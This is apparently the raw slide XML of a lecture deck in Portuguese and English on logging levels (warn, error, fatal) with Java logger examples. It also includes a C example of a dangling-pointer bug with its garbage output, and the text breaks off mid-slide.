        <p:nvSpPr>
          <p:cNvPr id="468" name="Google Shape;468;p7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2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Warn</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Potentially problematic situations or non-critical issues</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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70" name="Google Shape;470;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="1475425"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.warn("Disk space is running low: {} MB remaining", freeSpace); </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="471" name="Google Shape;471;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="3304225"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.warn("This feature will be removed in version 2.0.");</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="472" name="Google Shape;472;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="2389825"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.warn("Memory usage is high: {}%", memoryUsage);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="473" name="Google Shape;473;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736875" y="4221800"/>
            <a:ext cx="7890600" cy="7803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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Útil para gerar alertas e antecipar a detecção de problemas que estão prestes a ocorrer</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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7" name="Shape 477"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Google Shape;478;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="8630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2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Errors</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Errors that impact functionality but do not stop the app</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="479" name="Google Shape;479;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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80" name="Google Shape;480;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="1246825"/>
            <a:ext cx="8362800" cy="13914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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  database.connect();</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> (SQLException e) {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  logger.error("Database connection failed: {}", e.getMessage(), e);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Google Shape;481;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="3837625"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.error("REST API call failed with status code: {}", statusCode);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="2999425"/>
            <a:ext cx="8362800" cy="400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a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>logger.error("File not found at path: {}", filePath);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Google Shape;483;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660675" y="4374200"/>
            <a:ext cx="7890600" cy="738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800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Útil para detectar erros, por exemplo, quando n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ão se tem acesso à console do sistema</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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Bugs devido a dangling pointers </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>(apontam para uma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>área de memória que já foi liberada)</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Google Shape;128;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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29" name="Google Shape;129;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697925" y="1536250"/>
            <a:ext cx="5423400" cy="33864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sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>#include &lt;stdlib.h&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>void dangling_pointer_example() {</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  int *ptr = (int *) malloc(sizeof(int));</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  *ptr = 42;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  printf("Value: %d\n", *ptr); </a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  free(ptr);</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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t/>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>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600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  printf("Value: %d\n", *ptr);</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6275250" y="1581275"/>
            <a:ext cx="21120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rPr>
              <a:t>Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 42</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Value: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1594890351</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Value: 42</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Value: 157153121</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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7" name="Shape 487"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2164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2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fatal</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Critical errors that cause the application to stop.</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>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
        <p:nvSpPr>
          <p:cNvPr id="489" name="Google Shape;489;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142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90" name="Google Shape;490;p74"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="942025"/>
            <a:ext cx="8658000" cy="1639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b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  initializeSystem();</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>catch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t> (OutOfMemoryError e) {</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>  logger.fatal("Critical error: Out of memory. Shutting down application.", e);</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk2"/>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lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
